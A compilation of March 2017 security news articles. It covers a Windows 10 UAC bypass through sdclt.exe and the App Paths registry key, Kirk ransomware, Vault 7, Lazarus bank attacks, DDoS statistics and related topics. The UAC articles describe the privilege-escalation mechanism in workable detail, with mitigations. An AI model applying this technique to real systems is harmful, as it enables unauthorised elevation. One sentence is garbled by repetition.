20.3.2017 securityaffairs Vulnerebility

The security expert Matt Nelson has devised a new method that leverages App Paths to bypass the User Account Control (UAC) only on Windows 10.
The researcher detailed a bypass technique that is quite differed to the previous ones he devices, the new method “doesn’t rely on the IFileOperation/DLL hijacking approach”.
“I’ve previously blogged about two different bypass techniques, and this post will highlight an alternative method that also doesn’t rely on the IFileOperation/DLL hijacking approach.” reads a blog post published by Nelson. “This technique works on Windows 10 build 15031, where the vast majority of public bypasses have been patched.”

The expert explained that there are several signed binaries in Microsoft OS that auto-elevate due to their manifest. Nelson analyzed them and focused its investigation on sdclt.exe, which is the process associated with the Backup and Restore tool in Windows.

He discovered that sdclt.exe auto-elevates due to its manifest only in Windows 10.

The sdclt.exe starts control.exe to open up a Control Panel item in high-integrity context, the process obtains the path to control.exe by querying the App Path key for it within the HKEY_CURRENT_USER hive.

“Looking again at the execution flow, sdclt.exe queries the App Path key for control.exe within the HKEY_CURRENT_USER hive.” explained Nelson.

“Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with,”

An attacker can modify the key that is retrieved by the sdclt.exe query, the expert managed to have cmd.exe returned to the query.

User Account Control bypass

The method doesn’t allow for using parameters, in order to exploit it the attacker has to place the malicious payload to the disk.

“If you try to give the binary any parameters (e.g, C:\Windows\System32\cmd.exe /c calc.exe), it will interpret the entire string as the lpFile value to the ShellExecuteInfo structure, which is then passed over to ShellExecuteEx. Since that value doesn’t exist, it will not execute.” continues Nelson.

The expert published a PoC script to demonstrate the method, he explained that attack can be prevented by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group.


Kirk ransomware – A Star Trek Themed Ransomware that requests Monero payments
20.3.2017 securityaffairs Virus

The researchers have discovered a new piece of ransomware featuring a Star Trek theme, dubbed Kirk ransomware, the first one accepting Monero payments.
Ransomware continues to be one of the most profitable cyber threats, for this reason, every week we see new strains of malware in the wild.

The researchers have discovered a new piece of ransomware featuring a Star Trek theme, dubbed Kirk ransomware, that is able to encrypt 625 different file types.

The ransomware appends the. kirk extension to the encrypted file’s name.

The name of the Kirk ransomware is clearly inspired by the name of the popular character in the fiction series Start Trek, such as the name of a decryptor called Spock associated with the threat.

The Kirk ransomware was first discovered by the Avast malware researcher Jakub Kroustek, it is written in Python and is the first ransomware that uses Monero cryptocurrency as the payment currency of choice.

View image on TwitterView image on TwitterView image on TwitterView image on Twitter
Follow
Jakub Kroustek @JakubKroustek
This is interesting! #Ransomware made by Trekkie - #Kirk ransomware & #Spock decryptor. Payments in #Monero. #Python https://www.virustotal.com/en/file/39a2201a88f10d81b220c973737f0becedab2e73426ab9923880fb0fb990c5cc/analysis/ …
4:29 PM - 16 Mar 2017
86 86 Retweets 82 82 likes
“Discovered today by Avast malware researcher Jakub Kroustek, the Kirk Ransomware is written in Python and may be the first ransomware to utilize Monero as the ransom payment of choice.” wrote Lawrence Abrams from BleepingComputer.

The majority of ransomware in the wild demands Bitcoin payments.

“Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult.”

The researchers are still investigating the way the Kirk Ransomware is being distributed, they observed it masquerading as the popular network stress tool Low Orbital Ion Cannon.

When the malware is executed it generate an AES key that will be used to encrypt a victim’s files. The AES key will then be encrypted by an embedded RSA-4096 public encryption key and saved in a called ‘pwd‘ that is stored in the directory of the ransomware executable.

The crooks behind the Kirk ransomware ask for this file to be able to provide the victims with the decryptor.

In the same folder, the ransomware drops a ransom note, users are instructed to purchase around $1,100 worth of Monero and send it to a specific address. Once the victim has paid the ransomware then he should send the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses in order to receive the Spock decryptor.

“At this time there are no known victims of this ransomware and it does not appear to be decryptable,” Abrams added.

adrotate banner=”9″]


Předinstalovaný malware ve smartphonech je novou zákeřnou hrozbou

19.3.2017 SecurityWorld Viry
Technologie Check Point Mobile Threat Prevention odhalila závažnou infekci ve 38 zařízeních se systémem Android ve velké telekomunikační společnosti a nadnárodní technologické společnosti. I když to není nic neobvyklého, jeden detail útoků je velmi zajímavý. Ve všech případech nebyl malware stažen do zařízení uživatelem, ale hrozba už byla v zařízení předinstalovaná.

Malware byl v zařízeních ještě předtím, než je uživatelé obdrželi, ale škodlivé aplikace nebyly součástí oficiální ROM dodaném výrobcem a byly přidány až někde během dodavatelského řetězce. V šesti případech byl malware navíc přidán pomocí systémových oprávnění přímo do ROM zařízení, takže hrozba nemohla být odstraněna uživatelem a zařízení muselo být přeflashováno.

Výzkumný tým byl schopen určit, kdy výrobce dokončil instalaci systémových aplikací, kdy byl nainstalován malware a kdy uživatel zařízení dostal.

Ve většině případů objevený předinstalovaný malware na zařízeních kradl informace a generoval zisky ze zobrazování nelegitimní reklamy. V jednom případě se jednalo o mobilní ransomware Slocker. Slocker používá šifrovací algoritmus AES pro zašifrování všech souborů na zařízení a za poskytnutí dešifrovacího klíče požadoval výkupné. Slocker používá pro komunikaci s C&C serverem anonymní síť Tor.

Obecným pravidlem je, že by se uživatelé měli vyhnout riskantním webovým stránkám a měli by stahovat aplikace pouze z oficiálních a důvěryhodných zdrojů. Nicméně jen dodržovat tyto pokyny nestačí. Předinstalovaný malware ohrožuje bezpečnost i těch nejpečlivějších uživatelů. Navíc uživatel, který obdrží zařízení s malwarem, není schopen zaznamenat jakékoliv změny v činnosti přístroje, které se často vyskytují po instalaci malwaru.

Objevení předinstalovaného malwaru vyvolává řadu znepokojivých otázek ohledně mobilní bezpečnosti. Uživatelé mohou dostat zařízení, které obsahuje zadní vrátka nebo je rootované bez jejich vědomí. Pro ochranu před normálním i předinstalovaným malwarem by měli uživatelé používat pokročilá bezpečnostní opatření, která mohou identifikovat a blokovat jakoukoliv anomálii v chování zařízení.


App Paths Used to Bypass User Account Control in Windows 10

19.3.2017 securityaffairs  Vulnerebility

A new technique that leverages App Paths to bypass the User Account Control (UAC) in Windows 10 has been detailed by security researcher Matt Nelson.

Over the past several months, Nelson detailed other UAC bypass methods as well, namely one abusing Event Viewer and another leveraging the Disk Cleanup utility. The former has been used in live attacks by Remcos RAT and Erebus ransomware operators, as well as by a threat actor targeting military and aerospace organizations in Russia and Belarus.

Now, the researcher uncovered yet another bypass that “doesn’t rely on the IFileOperation/DLL hijacking approach,” but which works only on Windows 10. According to Nelson, Microsoft has focused on resolving the issues leading to previously disclosed bypasses, but the new technique works on Windows 10 build 15031, “where the vast majority of public bypasses have been patched.”

Because there are Microsoft signed binaries that auto-elevate due to their manifest, the researcher decided to have a closer look, and discovered an issue associated with sdclt.exe, which is the process associated with the Backup and Restore tool in Windows. As it turns out, sdclt.exe auto-elevates due to its manifest, but only in Windows 10 (its manifest in Windows 7 prevents auto-elevation when started from medium integrity).

The execution flow of sdclt.exe reveals that the binary starts control.exe to open up a Control Panel item in high-integrity context, and the researcher discovered that the process obtains the path to control.exe by querying the App Path key for it within the HKEY_CURRENT_USER hive.

“Calls to HKEY_CURRENT_USER (or HKCU) from a high integrity process are particularly interesting. This often means that an elevated process is interacting with a registry location that a medium integrity process can tamper with,” Nelson says.

If the search for the full path of control.exe doesn’t return the key from the HKCU hive, sdclt.exe continues the typical Windows search order. However, since the key can be modified and the process searchers for it first, an attacker can use this to have sdclt.exe query a modified App Paths key. The researcher managed to have cmd.exe returned to the query, a process that is high integrity.

One thing that this technique doesn’t allow for, however, is parameters, meaning that the attacker has to place the payload to the disk. When parameters are added, the string is interpreted as the lpFile value to the ShellExecuteInfo structure, which is passed over to ShellExecuteEx, but won’t execute, given that the value doesn’t exist.

The researcher also published a script to GitHub to demonstrate the attack. “The script takes a full path to your payload. C:\Windows\System32\cmd.exe is a good one to validate. It will automatically add the keys, start sdclt.exe and then cleanup,” Nelson explains.

The attack can be prevented by setting the UAC level to “Always Notify” or by removing the current user from the Local Administrators group, the researcher explains. Further monitoring for this attack could be achieved by utilizing methods/signatures to look for and alert on new registry entries in HKCU\Microsoft\Windows\CurrentVersion\App Paths\Control.exe.


Arbor Networks linked a new Acronym Malware to the Potao Express campaign
19.3.2017 securityaffairs Virus

Security experts at Arbor Networks linked a new Acronym malware to the malicious code used by threat actors behind the Operation Potao Express.
Security experts at Arbor Networks have spotted a new strain of malware that could be linked to the malicious code used by threat actors behind the Operation Potao Express.

The researchers started the investigation after the Italian researchers Antelox shared a link to a VirusTotal analysis on Twitter.

Follow
Antelox @Antelox
anybody recognize this?https://www.virustotal.com/en/file/4a91289e99d3597f4c9e54a3d1d311dfb66aa92fd476463834e4d1f8df651762/analysis/ …@Techhelplistcom @malwrhunterteam @JAMESWT_MHT
7:13 PM - 3 Mar 2017
2 2 Retweets 4 4 likes
The analysis of the malicious code and of the dropper suggested a possible link to the Potao malware family.

Like the Potao trojan, the Acronym malware has a modular structure.

The Potao malware, which has been described as a “universal modular cyber espionage toolkit,” has been around since at least 2011, but it was first analyzed in detail in 2015 by ESET.

In August 2015, ESET issued a report on a cyber espionage campaign dubbed Operation Potao Express that relied on the diffusion of a trojanized Russian language version of TrueCrypt.

The malware was used in targeted attacks against entities and high-value targets in Ukraine, Russia, Georgia, and Belarus.

Acronym malware potao express eset-623x4322

Back to the present, the malware researchers at Arbor Networks have discovered a malicious code dubbed “Acronym” based on a debugging string and the URLs pointing to command and control (C&C) servers.

“Upon further investigation, it is a modular malware known as Acronym and could possibly be associated with the Win32/Potao malware family and the Operation Potao Express campaign. This post takes a look at our analysis of Acronym thus far.” reads the analysis published by Arbor Networks.

Both Acronym and its dropper appear to have been compiled in February 2017.

The analysis of the Dropper component revealed that it starts by killing any Windows processes named “wmpnetwk.exe,” and replace it with the malicious code.

It then contacts a C&C server and sends it information about the infected machine.

Once the bot has completed the initialization phase, it will contact the command and control servers (C2s) and sends back the information iterating through six possible IP/port pairs.

The Acronym malware gains persistence using Registry or the Task Scheduler.

The malware is able to capture screenshots, download and execute other payloads, and run plugins.

Unfortunately, we have no information about the plugins available because the C&C servers were offline at the time of the analysis conducted by Arbor Networks.

Researchers noticed that the Potao trojan and the Acronym malware use the same C&C infrastructure, both contact C&C domains on the same ports, and both use temporary file names that start with “HH.”

The experts also noticed also some differences between the two threats, the encryption and the delivery mechanism are different.

“On the other hand though, there is a lot of functionality missing in Acronym that was documented in Win32/Potao. Some examples:

No decoy document used in the dropper
Dropper doesn’t stored the dropped executable compressed
Doesn’t inject into any processes
Doesn’t drop a DLL, but an EXE
No string encryption
No RSA key exchange
No AES encryption
No XML data exchange
Different system information query string
No Windows API hashing”
“As usual with new malware it is too soon to assess how active and widespread this new family will become, but it does have a potential link to a long running malware campaign known as Operation Potao Express that makes it worth watching,” concluded Arbor Networks.


WikiLeaks will disclose CIA exploits to tech companies under specific conditions
19.3.2017 securityaffairs BigBrothers

Assange sent an email to tech firms including “a series of conditions” that they need to fulfill before gaining access to details included in the Vault 7.
A couple of weeks ago Wikileaks published the Vault 7 archive, a huge trove of files detailing CIA hacking tools and capabilities.

The files allegedly originated from a high-security network of the U.S. Central Intelligence Agency (CIA). The Vault 7 data leak sheds light on the hacking capabilities of the US Intelligence Agency and provided details about its spying infrastructure used for the massive surveillance.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia,” reads the announcement issued by WikiLeaks by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, Trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

The Vault 7 dump includes confidential information, hacking tools, malicious codes and exploits developed to hack popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

Vault 7

The hacking tools in the arsenal of the CIA have been developed by the CCI’s Engineering Development Group (EDG). The developers at EDG are tasked of developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

WikiLeaks announced it was planning to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected even if the White House has warned that there may be legal repercussions for the organization.

The organization wants to protect the customers of the major companies that use the products of several major companies that are impacted by the hacking tools in the data leak.

WikiLeaks clarified it would not release tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons‘ should analyze, disarmed and published.”

During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out,” WikiLeaks’ founder Julian Assange said during a Facebook Live press conference last week.

What has happened after a few days?

Assange contacted tech companies, included Apple, Microsoft, and Google in explain how Wikileaks intends to share the knowledge about the vulnerabilities the CIA was allegedly taking advantage.

It seems that Wikileaks requested the satisfaction of specific conditions to the tech companies.

According to Motherboard, Assange sent an email to Apple, Google, Microsoft and other companies this week including “a series of conditions” that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools included in the Vault 7 archive.

“WikiLeaks included a document in the email, requesting the companies to sign off on a series of conditions before being able to receive the actual technical details to deploy patches, according to sources.”reads the blog post published by Motherboard. “It’s unclear what the conditions are, but a source mentioned a 90-day disclosure deadline, which would compel companies to commit to issuing a patch within three months.”

Sources cited by Motherboard and informed on the matter mentioned a 90-day disclosure deadline, this means that Wikileaks is requesting tech companies to issue a patch for the vulnerabilities in just 3 months.


Follow
WikiLeaks ✔ @wikileaks
Update on CIA #Vault7 "zero day" software vulnerabilities

Ref: https://wikileaks.org/ciav7p1
3:45 AM - 18 Mar 2017
3,475 3,475 Retweets 4,233 4,233 likes
This implies an additional effort to the tech firms that would also decide to do not comply with Wikileaks’ conditions.

Of course, the best option for tech firms is to accept the conditions and fix the issues as soon as possible. At the same time also the CIA can decide to pass the information on the flaws to the companies avoiding that hackers in the wild can take advantage of the bugs. We cannot exclude that also a foreign government is already exploiting the flaws in targeted attacks.

“WikiLeaks and the government hold all the cards here, there’s not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related,” one of the anonymous sources said.

The CIA declined to comment on whether it plans to alert the tech companies. According to Motherboard, a spokesperson sent a statement saying that the agency has “no comment on the authenticity of purported intelligence documents released by Wikileaks or on the status of any investigation into the source of the documents.”

“As we’ve said previously, Julian Assange is not exactly a bastion of truth and integrity,” the spokesperson wrote. “The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize US personnel and operations, but also equip our adversaries with tools and information to do us harm.”


WikiLeaks Won't Disclose CIA Exploits To Companies Until Certain Demands Are Met
18.3.2017 thehackernews BigBrothers

It's been over a week since Wikileaks promised to hand over more information on hacking tools and tactics of the Central Intelligence Agency (CIA) to the affected tech companies, following a leak of a roughly 8,761 documents that Wikileaks claimed belonged to CIA hacking units.
"We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out," WikiLeaks' founder Julian Assange said during a Facebook Live press conference last week.
However, it looks like the things aren't that easier for tech companies as they look.
After days of waiting, Assange made its first contact with Apple, Microsoft, and Google this week and finally made his intentions clear – no sharing of bugs and vulnerabilities the CIA is or was allegedly taking advantage of until certain demands are met.
Multiple anonymous sources familiar with the matter told Motherboard that Assange sent an email to Apple, Google, Microsoft and other companies mentioned in the Vault 7 Leak this week and instead of reporting the bugs and exploits found in the leaked CIA documents, he made some demands.
A document included in the email listed "a series of conditions" that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools the anti-secrecy organization has in its possession.
Although the exact conditions are still unclear, one of the sources mentioned a 90-day disclosure deadline, which would require tech companies to issue a patch for the vulnerabilities within a three-month timeframe.
It's also not clear if any of the affected tech companies plan to comply with Wikileaks' demands.
While major tech companies like Apple, Google and Microsoft said that their recent security updates had already fixed the bugs mentioned in Vault 7, they would probably need to check out what WikiLeaks has in its store to ensure proper deployment of patches.
What will happen next is entirely unclear, but since the CIA has had its hacking arsenal public, the best option for the agency is to personally disclose all those loopholes and exploits to the affected companies to keep itself and its citizens safe from hackers as well as foreign government.
"WikiLeaks and the government hold all the cards here, there's not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related," one of the anonymous sources said.
Vault 7 is just the beginning of WikiLeaks' Year Zero disclosure, as the group promised to release more from the government and intelligence agencies in coming weeks.


Symantec blames North Korean Lazarus APT group for recent attacks on banks
18.3.2017 thehackernews APT

Further investigation on the attacks against Polish banks allowed Symantec to determine that North Korean Lazarus APT group was behind recent attacks on banks.
According to malware researchers at Symantec, the North Korean APT group Lazarus was likely behind a recent string of cyber attacks against organizations in 31 countries. According to Symantec, the Lazarus APT was behind high-profile attacks on Bangladesh Bank, Sony and South Korea,

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

Experts at Symantec collected evidence demonstrating the Lazarus APT group was behind the campaign that leveraged on a “loader” software used to stage attacks by installing other malicious programs.

“We are reasonably certain” Lazarus behind the attacks, Symantec researcher Eric Chien said in an interview with the Reuters Agency.

Both US and South Korea governments are blaming Pyongyang for the attacks, but the North Korean government has denied allegations it was behind the hacks.

Symantec did not identify the organizations that were targeted in the last wave of attacks, it is not clear is Lazarus APT group has stolen money from the victims.is not clear is Lazarus APT group has stolen money from the victims..is not clear is Lazarus APT group has stolen money from the victims..is not clear is Lazarus APT group has stolen money from the victims.

According to the experts from the security firm, there was a significant escalation of the Lazarus APT group, it used more sophisticated techniques targeting than in previous cyber attacks.

Experts at Symantec analyzed the hacking campaign launched last month by the Lazarus Group. The investigations started after Polish banks had been infected with a sophisticated strain of malware.

Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the Polish Financial Supervision Authority (KNF) “in order to secure evidence.”

Both security firms BAE Systems and Symantec started their investigation on the attacks. According to Symantec, the threat actor behind the attack is the same that targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

At the time, Symantec said it had “weak evidence” to blame the Lazarus APT, but now the data gathered by the experts confirm the involvement of the group.

The malicious code was instructed to infect visitors whose IP address showed they were from 104 specific organizations in 31 countries.

The largest number of victims were in Poland, followed by the United States, and Mexico.

Lazarus APT


Global DDoS Threat Landscape Q4 2016 – US, UK and Netherlands top attacked countries
18.3.2017 securityaffairs Attack

Imperva published the Global DDoS Threat Landscape
Q4 2016, according to the experts the US, the UK and Netherlands are top attacked countries.
Distributed denial of service (DDoS) attacks continue to represent a serious threat to organizations worldwide. The attacks are growing in size and level of sophistication according to the new report ‘Global DDoS Threat Landscape
Q4 2016‘ published by Imperva.

According to the experts at Imperva, the creation of huge Internet of Things botnets and the availability of cheap DDoS-for-hire services are creating the condition for the growth of DDoS attacks.

Network layer attack sizes reached a record high, just before Christmas a massive DDoS attack powered by a new botnet dubbed Leet Botnet hit the network of the firm Imperva.

Global DDoS Threat Landscape Q4 2016 - US, UK and Netherlands top attacked country list

The Mirai Botnet was also used to power similar DDoS attacks in the same period. In Q3 the experts observed longest network layer attack of the year, which lasted for 29 days.

These amazing volume of malicious traffic is reached thanks to the use of amplification vectors.

The number of application layer attacks continued to increase peaking in Q4 the number of 889 attacks a week.

In the last quarter of the year, experts from Imperva mitigated an average of 280 network layer attacks per week, totaling 3,603, a 39.4% drop from Q3. According to the experts, the majority of DDoS attacks (89%) lasted for less than one hour.

Imperva mitigated 11,727 application layer attacks, for an average of 889 per week (+2.9% from Q3 2016).

“In Q4 2016, single-vector network attacks increased by almost seven percent from Q3, reaching a yearly high of 71%. Moreover, the percentage of assaults in which perpetrators used five or more different payloads dropped from 3.9 percent in Q3 to 1.9 percent in the following quarter.” reads the report.

“With respect to multi-vector attacks, the downward trend we’re seeing can likely be attributed to the increase in less-sophisticated assaults being instigated by non-professional perpetrators using botnet-for-hire (a.k.a., stresser or booter) services.”

The largest application layer attack reached 91,209 RPS (requests per second), while the longest attack DDoS lasted 47 days. 74.7% of application layer DDoS attacks lasted less than an hour.

“The Incapsula network saw an increase in attack frequency, with the number of targets hit by multiple assaults reaching 58.3 percent, compared with 54.7 percent in Q3.” continued the Incapsula report. “In fact, the percentage of sites targeted more than ten times in Q4 reached 13.1 percent, the highest figure ever recorded for this attack frequency category.”

To avoid detection, DDoS bots continues to use fake user agents to assume legitimate tool and browser identities.

According to the experts, the quantity of sophisticated, browser-based bots that retain cookies and execute JavaScript jumped from 8.0% up to 13.6% in Q4.

Giving a look at Top Attacking Countries, China is at the first place (78,5), followed by Vietnam (4.5%), South Korea (2.9%), United States (1.7%)

The US was the Top targeted country (56.7%), followed by the United Kingdom (9.6%), and the Netherlands (8.6%).


The Global DDoS Threat Landscape Q4 2016 includes many other interesting data on these specific threats, Enjoy it!


Star Trek-Themed "Kirk" Ransomware Emerges

17.3.2017 securityweek Virus
A newly discovered piece of ransomware featuring a Star Trek theme is targeting 625 different file types and demanding a ransom be paid in virtual currency Monero, security researchers have discovered.

The threat is dubbed Kirk and is paired with a decryptor called Spock, referencing to two characters in the Star Trek science fiction series. Discovered by Avast malware researcher Jakub Kroustek, the new malware was written in Python and might be the very first threat of its kind to use Monero as the payment currency of choice.

Monero is an open-source cryptocurrency launched on April 18, 2014 with a focus on privacy that started seeing increased popularity only last year, after major darknet market AlphaBay adopted it at the end of summer 2016. Over the past several months, we’ve seen Monero miners distributed by the Sundown exploit kit and its Terror EK variation, as well as by other threats targeting Windows and Linux machines.

However, as BleepingComputer’s Lawrence Abrams notes, Kirk ransomware might be the very first to utilize Monero for payment purposes. Most other ransomware out there demands Bitcoin instead, and the change could actually create confusion, the researcher argues.

“Even with Bitcoin becoming more accepted, it is still not easy to acquire them. By introducing a new cryptocurrency into the mix, victims are just going to become more confused and make paying ransoms even more difficult,” Abrams says.

Kirk ransomware’s distribution channels aren’t clear at the moment, but the researchers have seen it masquerading as the network stress tool called Low Orbital Ion Cannon. Upon execution, the ransomware generates an AES key used to encrypt a victim's files, after which it encrypts the key using an embedded RSA-4096 public encryption key and saves it in a file called pwd in the same directory as the ransomware executable.

Only the attackers are able to decrypt this file and reveal the encryption AES key, and Kirk ranomware victims are advised to make sure they don’t delete it. The attackers apparently ask for this file to be able to provide the victims with the needed decryptor.

Kirk ransomware displays a message box showing the same slogan as the LOIC network stress tool: “Low Orbital Ion Cannon | When harpoons, air strikes and nukes fail | v1.0.1.0.” In the background, the ransomware searches the hard drive for files to encrypt. It targets a total of 625 file types, encrypts them and appends the .kirk extension to the encrypted file's name.

The malware drops a ransom note in the same folder as the executable and displays it in a window on the desktop. Users are instructed to purchase around $1,100 worth of Monero and send it to a specific address. After making the payment, the victim should send the pwd file and the payment transaction ID to the kirk.help@scryptmail.com or kirk.payments@scryptmail.com email addresses.

The Spock decryptor is supposedly sent to the victim after the payment is made. Unfortunately, the researchers haven’t had the chance to analyze this tool yet.

“At this time there are no known victims of this ransomware and it does not appear to be decryptable,” Abrams says.


Hackers Earn Big Bounties for GitHub Enterprise Flaws

17.3.2017 securityweek Vulnerebility
White hat hackers have earned tens of thousands of dollars in bounties after finding serious vulnerabilities in GitHub Enterprise.

GitHub Enterprise is the on-premises version of GitHub.com, for which organizations pay an annual fee of $2,500 for every 10 users. The product promises enterprise-grade security, 24/7 technical support, hosting options, and several administration features not available for GitHub.com.

GitHub Enterprise versions 2.8.5, 2.8.6 and 2.8.7, released in January, patch several flaws rated critical and high severity, including ones that can be exploited to bypass authentication and remotely execute arbitrary code.

The researchers who discovered the vulnerabilities have started making their findings public, and information from GitHub and the experts themselves shows that they earned significant rewards.

GitHub included the Enterprise product in its bug bounty program at the beginning of the year, when it announced that the most severe bugs reported in January and February would also receive bonus rewards.

Two of the vulnerabilities rated critical were identified by Greece-based researcher Ioannis Kakavas. The expert discovered a couple of flaws in the Security Assertion Markup Language (SAML) implementation of GitHub Enterprise, and received a research grant to conduct a full assessment of SAML in GitHub.

Kakavas, who is currently the second best hacker in GitHub’s bug bounty program, earned a total of $27,000 for the flaws he uncovered. He recently published a blog post containing technical details and proof-of-concept (PoC) code.

Another critical flaw was discovered by German bug bounty hunter Markus Fenske. The expert found a weakness in the management console that could have been exploited to execute arbitrary commands on the GitHub Enterprise appliance.

Fenske has received a total of $18,000 for his findings, which includes a $10,000 bounty, the maximum reward offered by GitHub, and an $8,000 bonus.

Researcher Orange Tsai, who last year managed to hack a Facebook server, received $5,000 and a $5,000 bonus for responsibly disclosing a high severity SQL injection vulnerability related to the pre-receive hook APIs used by GitHub Enterprise.

GitHub said there was no evidence that the vulnerabilities identified by Fenske and Kakavas had been exploited in the wild.


U.S. Warns of Security Issues With HTTPS Inspection Products

17.3.2017 securityweek Safety
The U.S. Department of Homeland Security's US-CERT has issued a new alert warning about problems with some HTTPS inspection products.

The alert, 'HTTPS Interception Weakens TLS Security (TA17-075A)' warns that "Failure [by the SSL/TLS interception software] to perform proper validation or adequately convey the validation status increases the probability that the client will fall victim to MitM attacks by malicious third parties."

This alert follows the publication earlier this month of a detailed study of the problem. The study concluded that HTTPS interception before the endpoint (such as that done by anti-virus products) can weaken rather than strengthen network security. The CERT Coordination Center (CERT/CC) first raised the issue two years ago in a blog post titled 'The Risks of SSL Inspection' -- but US-CERT has only now issued an alert.

The reason for this long delay between unofficial and official warnings is probably twofold. Firstly, the "blog post for CERT was mostly an observation based on a very small sample set of HTTPS inspection solutions that I was able to test myself," author Will Dormann, a vulnerability analyst at CERT/CC, told SecurityWeek. "It was posed as an issue that needed to be investigated, with the goal that folks with the devices in question could perform their own testing and ideally get back to us with the results."

It was, in short, a valid but not-scientific analysis of the problem. The new scientific paper, he adds, "appears to have used my blog post as motivation. But they were able to take it much further and provide some real-world statistics about the prevalence of HTTPS interception. This presumably took some time to develop and collect results."

Dormann believes that the arrival of this paper and the availability of an easy-to-use test website (badssl.com) have combined to make the time right for a US-CRERET alert.

The second motivation for the alert is the increasing use of encryption by malicious actors to bypass security defenses and to hide data exfiltration. Dell highlighted the problem in its 2016 Threat Report. At least 900 million users were affected by encrypted hacks in 2015, it said.

Industry's response has been to install HTTPS inspection software to unpack the encryption and allow traffic inspection. This interception can be found in a range of products including anti-virus, firewalls, DLP, and secure web gateways. They operate by performing the customer's own 'legal' MitM attack on the traffic -- but in doing so they break the end-to-end encryption from the trusted server to the end client.

The problem comes in how the HTTPS inspection product then attempts to provide its own 'trust' to the client -- and tests have shown that many of the products are lacking. "Many HTTPS inspection products do not properly verify the certificate chain of the server before re-encrypting and forwarding client data," warns US-CERT, "allowing the possibility of a MitM attack. Furthermore, certificate-chain verification errors are infrequently forwarded to the client, leading a client to believe that operations were performed as intended with the correct server." It adds, "Because client systems may connect to the HTTPS inspection product using strong cryptography, the user will be unaware of any weakness on the other side of the HTTPS inspection."

This leaves industry with a difficult choice: to inspect HTTPS traffic for reasons of security and risk increasing the attack surface in the process; or to leave alone and find other ways to protect against encrypted bad intent. "There are compelling business reasons for corporations to be able to 'see into' encrypted traffic flows," comments Erka Koivunen, chief information security officer at F-Secure Corporation. "For instance, financial institutions may want to extend their control into encrypted traffic flows in terms of content inspection and Data Loss Prevention. It is no wonder the vendor community is pressurized to come up with 'innovative' ways to terminate HTTPS encryption by means of MitM."

But he doesn't think using good-intentioned MitM is the answer. "The research by CERT/CC and the US-CERT advisory seem to confirm our point of view," he told SecurityWeek. "MitM'ing HTTPS traffic adds unnecessary complexity and creates a risky tradeoff between content inspection and communications security." F-Secure has chosen not to provide an HTTPS inspection capability.

"Most of the functionality can, however, be enforced at an endpoint level," he added, "and this is where F-Secure has committed to excel. We believe that endpoint security solutions will continue to play a central role in enterprise security. While the 'other endpoint' will increasingly reside in the cloud, the security stack needs to be complemented with security in the cloud."

This won't suit all organizations; particularly those that choose 'security in depth'. US-CERT recommends that whether HTTPS inspection is employed or not, organizations should take additional steps to secure communications -- and points to the earlier alert (TA15-120A): Securing End-to-End Communications. This recommends using the latest version of TLS or SSL; using certificate pinning; the use of DNS-based Authentication of Named Entities (DANE); and using network notary services.

For HTTPS inspection products, suggests US-CERT, organizations could "use badssl.com as a method of determining if their preferred HTTPS inspection product properly validates certificates and prevents connections to sites using weak cryptography."

It is true, High Tech Bridge CEO Ilia Kolochenko, told SecurityWeek, "many organizations wrongly implement HTTPS interception by forcing all their client devices to trust any certificate. In a corporate environment, this can significantly facilitate phishing and drive-by-download attacks." But, he added, "US-CERT's recommendations, as well as HPKP usage, can solve this problem in a quite reliable manner."


Recent Fileless Attacks Linked to Single Framework, Researchers Say

17.3.2017 securityweek Virus

A series "fileless attacks" previously attributed to two different threat attackers are now believed to have been carried out by the same actor, from a single attack framework, Israeli security firm Morphisec reveals.

Starting on March 8, Morphisec researchers began investigating a new fileless attack carried out via a macro-enabled Word document attached to a phishing email that targeted high-profile enterprises. Their investigation led them to the discovery of a sophisticated fileless attack framework associated with multiple recent campaigns.

Last month, Kaspersky Lab uncovered a campaign comprised of more than 140 attacks aimed at banks, telecom companies and government organizations in the United States, the United Kingdom, France, Ecuador, Kenya, Brazil, Spain, Israel and 32 other countries. Common to these attacks was the use of PowerShell scripts to store the malicious code in memory and avoid leaving traces on the compromised machines.

In early March, Cisco detailed a so-called DNSMessenger attack, where threat actors were using a malicious Word document and a PowerShell RAT that could communicate with the command and control (C&C) servers via DNS requests. This sophisticated attack was also completely fileless and invisible to most standard anti-malware defenses.

